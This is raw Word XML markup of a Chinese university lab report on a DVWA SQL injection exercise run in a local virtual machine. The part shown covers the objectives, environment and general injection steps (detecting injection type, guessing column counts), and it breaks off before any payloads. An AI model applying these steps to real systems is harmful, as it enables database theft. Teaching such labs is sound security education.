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0B3AC" w14:textId="77777777" w:rsidR="003545C3" w:rsidRDefault="003545C3" w:rsidP="003545C3">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLineChars="295" w:firstLine="2132"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0369A322" w14:textId="77777777" w:rsidR="003545C3" w:rsidRDefault="003545C3" w:rsidP="003545C3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06A3F412" w14:textId="77777777" w:rsidR="003545C3" w:rsidRDefault="003545C3" w:rsidP="003545C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD70A2A" w14:textId="77777777" w:rsidR="00D33C19" w:rsidRDefault="00D33C19" w:rsidP="00D33C19">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AA07317" wp14:editId="186BEC62">
            <wp:extent cx="2108812" cy="1957099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657" cy="19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CCDF" w14:textId="77777777" w:rsidR="00D33C19" w:rsidRDefault="00D33C19" w:rsidP="003545C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="549931CB" w14:textId="77777777" w:rsidR="00D33C19" w:rsidRDefault="00D33C19" w:rsidP="003545C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14182E16" w14:textId="77777777" w:rsidR="00D33C19" w:rsidRDefault="00D33C19" w:rsidP="003545C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EACC6B3" w14:textId="48F7C812" w:rsidR="003545C3" w:rsidRPr="00D33C19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课程名称</w:t>
      </w:r>
      <w:r w:rsidR="00EB0DC2">
        <w:rPr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《网络</w:t>
      </w:r>
      <w:r w:rsidR="00EB0DC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>攻击与防御技术</w:t>
      </w:r>
      <w:r w:rsidR="00763259">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>》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454FB085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3259">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00763259">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>计算机科学技术学院</w:t>
      </w:r>
      <w:r w:rsidR="00763259">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00D33C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D33C2F3" w14:textId="77777777" w:rsidR="00D33C19" w:rsidRPr="00D33C19" w:rsidRDefault="00D33C19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 w:rsidRPr="00D33C19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>专</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D33C19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>业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 w:rsidR="00763259">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>信息安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">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65CA9594" w14:textId="77777777" w:rsidR="003545C3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黄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="00763259">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>力</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00D33C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">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7D93C8A" w14:textId="77777777" w:rsidR="003545C3" w:rsidRPr="003C10AA" w:rsidRDefault="003545C3" w:rsidP="00D33C19">
      <w:pPr>
        <w:ind w:firstLineChars="500" w:firstLine="1606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763259">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>15307130275</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">      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</w:p>
    <w:p w14:paraId="53F43194" w14:textId="77777777" w:rsidR="003545C3" w:rsidRDefault="003545C3" w:rsidP="003545C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A1EE47D" w14:textId="09155FB7" w:rsidR="003545C3" w:rsidRDefault="003545C3" w:rsidP="00762868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EB0DC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2018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2019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762868">
        <w:rPr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EB0DC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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6E307490" w14:textId="77777777" w:rsidR="003545C3" w:rsidRPr="00763259" w:rsidRDefault="003545C3" w:rsidP="003545C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53F49A65" w14:textId="77777777" w:rsidR="003545C3" w:rsidRDefault="003545C3" w:rsidP="003545C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="95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3545C3" w:rsidRPr="00822EAE" w14:paraId="0A06ED58" w14:textId="77777777" w:rsidTr="00553298">
        <w:trPr>
          <w:trHeight w:val="13529"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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0"/>
              <w:gridCol w:w="4140"/>
              <w:gridCol w:w="872"/>
              <w:gridCol w:w="2029"/>
            </w:tblGrid>
            <w:tr w:rsidR="003545C3" w:rsidRPr="00822EAE" w14:paraId="44C20E36" w14:textId="77777777" w:rsidTr="00553298">
              <w:trPr>
                <w:trHeight w:val="911"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1440" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="69D3E5B0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lastRenderedPageBreak/>
                    <w:t>实验项目</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="011F7858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名    称</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4140" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="2F586E8F" w14:textId="174076E2" w:rsidR="003545C3" w:rsidRPr="00054F9F" w:rsidRDefault="00054F9F" w:rsidP="00054F9F">
                  <w:pPr>
                    <w:widowControl/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:eastAsia="Times New Roman"/>
                    </w:rPr>
                  </w:pP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DVWA</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="30"/>
                      <w:szCs w:val="30"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="tahoma" w:hAnsi="tahoma" w:cs="tahoma"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="30"/>
                      <w:szCs w:val="30"/>
                    </w:rPr>
                    <w:t>SQL </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="30"/>
                      <w:szCs w:val="30"/>
                    </w:rPr>
                    <w:t>注入实</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:cs="SimSun" w:hint="eastAsia"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="30"/>
                      <w:szCs w:val="30"/>
                    </w:rPr>
                    <w:t>验</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="872" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="6E962C54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szCs w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00822EAE">
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:hint="eastAsia"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>成绩</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2029" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="122F89B1" w14:textId="77777777" w:rsidR="003545C3" w:rsidRPr="00822EAE" w:rsidRDefault="003545C3" w:rsidP="00553298">
                  <w:pPr>
                    <w:ind w:right="-51"/>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun"/>
                      <w:b/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="63A80F52" w14:textId="26DB94DE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</w:p>
          <w:p w14:paraId="4160B799" w14:textId="25FBDC66" w:rsidR="003545C3" w:rsidRPr="00822EAE" w:rsidRDefault="003545C3" w:rsidP="00553298">
            <w:pPr>
              <w:ind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一、实验目的</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D7EA528" w14:textId="2B80DAEB" w:rsidR="00A41C46" w:rsidRDefault="004E4244" w:rsidP="002D5FE0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AD46F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidR="002D5FE0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>掌握</w:t>
            </w:r>
            <w:r w:rsidR="002D5FE0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidR="002D5FE0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入的漏洞原理以及利用方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="095B3248" w14:textId="505EB3F0" w:rsidR="00E4405B" w:rsidRPr="002D5FE0" w:rsidRDefault="00E4405B" w:rsidP="002D5FE0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初步了解</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>等注入工具的使用方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A04AE2E" w14:textId="39873D8E" w:rsidR="003545C3" w:rsidRPr="00822EAE" w:rsidRDefault="003545C3" w:rsidP="00553298">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="709ACDF6" w14:textId="2B9FB2D2" w:rsidR="003545C3" w:rsidRPr="00822EAE" w:rsidRDefault="003545C3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 w:rsidRPr="00822EAE">
              <w:rPr>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>二、实验内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24BFE8CE" w14:textId="6AE39571" w:rsidR="00CF6529" w:rsidRDefault="005F6098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83166C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>利用</w:t>
            </w:r>
            <w:r w:rsidR="00B95FE2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>虚拟机</w:t>
            </w:r>
            <w:r w:rsidR="0083166C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>上已有的</w:t>
            </w:r>
            <w:r w:rsidR="00B95FE2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>DVWA</w:t>
            </w:r>
            <w:r w:rsidR="00B95FE2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>软件，</w:t>
            </w:r>
            <w:r w:rsidR="00B95FE2" w:rsidRPr="00B95FE2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>通过访问该虚拟机上的</w:t>
            </w:r>
            <w:r w:rsidR="00B95FE2" w:rsidRPr="00B95FE2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>DVWA</w:t>
            </w:r>
            <w:r w:rsidR="00B95FE2" w:rsidRPr="00B95FE2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>页面，</w:t>
            </w:r>
            <w:r w:rsidR="00B75E67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>构造特定的</w:t>
            </w:r>
            <w:r w:rsidR="00B75E67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidR="00B75E67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>查询语句</w:t>
            </w:r>
            <w:r w:rsidR="00B95FE2" w:rsidRPr="00B95FE2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>对具有</w:t>
            </w:r>
            <w:r w:rsidR="00B95FE2" w:rsidRPr="00B95FE2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidR="00B95FE2" w:rsidRPr="00B95FE2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入漏洞的服务端进行攻击，</w:t>
            </w:r>
            <w:r w:rsidR="009D5E3D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>最终</w:t>
            </w:r>
            <w:r w:rsidR="00B95FE2" w:rsidRPr="00B95FE2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获得数据库相关内容。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DDE6FF6" w14:textId="5FDA3591" w:rsidR="00517133" w:rsidRDefault="00517133" w:rsidP="00D46DF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分析实验成功或失败的原因</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55D0880D" w14:textId="45758E9C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</w:p>
          <w:p w14:paraId="1388157C" w14:textId="32E11EE2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 w:rsidRPr="00CF6529">
              <w:rPr>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>三、实验</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>环境</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="535C510B" w14:textId="43043666" w:rsidR="00CF6529" w:rsidRDefault="00F14A96" w:rsidP="0017113A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）</w:t>
            </w:r>
            <w:r w:rsidR="00CF6529" w:rsidRPr="00CF6529">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>PC</w:t>
            </w:r>
            <w:r w:rsidR="00CF6529" w:rsidRPr="00CF6529">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>机</w:t>
            </w:r>
            <w:r w:rsidR="00CF6529">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>操作系统</w:t>
            </w:r>
            <w:r w:rsidR="00CF6529" w:rsidRPr="00CF6529">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00CF6529">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidR="00CF6529">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00CF6529">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Mojave</w:t>
            </w:r>
            <w:r w:rsidR="00CF6529">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10.14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23CB57F2" w14:textId="77777777" w:rsidR="001F0A38" w:rsidRPr="00CF6529" w:rsidRDefault="001F0A38" w:rsidP="001F0A38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虚拟机操作系统（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Parallels</w:t>
            </w:r>
            <w:r>
              <w:rPr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</w:rPr>
              <w:t>Desktop</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> 13.1.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>）：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>位</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CentOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13A7B4AF" w14:textId="77777777" w:rsidR="001F0A38" w:rsidRPr="001F0A38" w:rsidRDefault="001F0A38" w:rsidP="0017113A">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="20C75D17" w14:textId="1D22CB8D" w:rsidR="00CF6529" w:rsidRDefault="00CF6529" w:rsidP="0017113A">
            <w:pPr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四、实验原理</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AE9AFD0" w14:textId="0C94C2D0" w:rsidR="00193749" w:rsidRDefault="00CA5C8A" w:rsidP="00193749">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5C8A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5C8A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入是指通过</w:t>
            </w:r>
            <w:r w:rsidR="007449EE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>构造特定的</w:t>
            </w:r>
            <w:r w:rsidR="007449EE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidR="007449EE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>查询语句</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5C8A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入恶意的</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5C8A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5C8A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>命令，破坏</w:t>
            </w:r>
            <w:r w:rsidR="007449EE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>原</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5C8A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5C8A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>查询语句的结构，从而达到执行恶意</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5C8A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5C8A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>语句的</w:t>
            </w:r>
            <w:r w:rsidR="007449EE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>攻击行为</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5C8A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r w:rsidR="00193749">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidR="00193749">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入的步骤一般是（参考资料</w:t>
            </w:r>
            <w:r w:rsidR="00193749">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00193749">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>）：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03220DE2" w14:textId="03E09CBD" w:rsidR="00193749" w:rsidRP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1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00193749">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>判断是否存在注入，注入是字符型还是数字型</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DD824BF" w14:textId="38A8FEF8" w:rsidR="00193749" w:rsidRP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2.</w:t>
            </w:r>
            <w:r w:rsidRPr="00193749">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>猜解</w:t>
            </w:r>
            <w:r w:rsidRPr="00193749">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00193749">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>查询语句中的字段数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DE64170" w14:textId="464A498F" w:rsidR="00193749" w:rsidRP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3.</w:t>
            </w:r>
            <w:r w:rsidRPr="00193749">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>确定显示的字段顺序</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A5384D0" w14:textId="2AF4C825" w:rsidR="00193749" w:rsidRP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4.</w:t>
            </w:r>
            <w:r w:rsidRPr="00193749">
              <w:rPr>
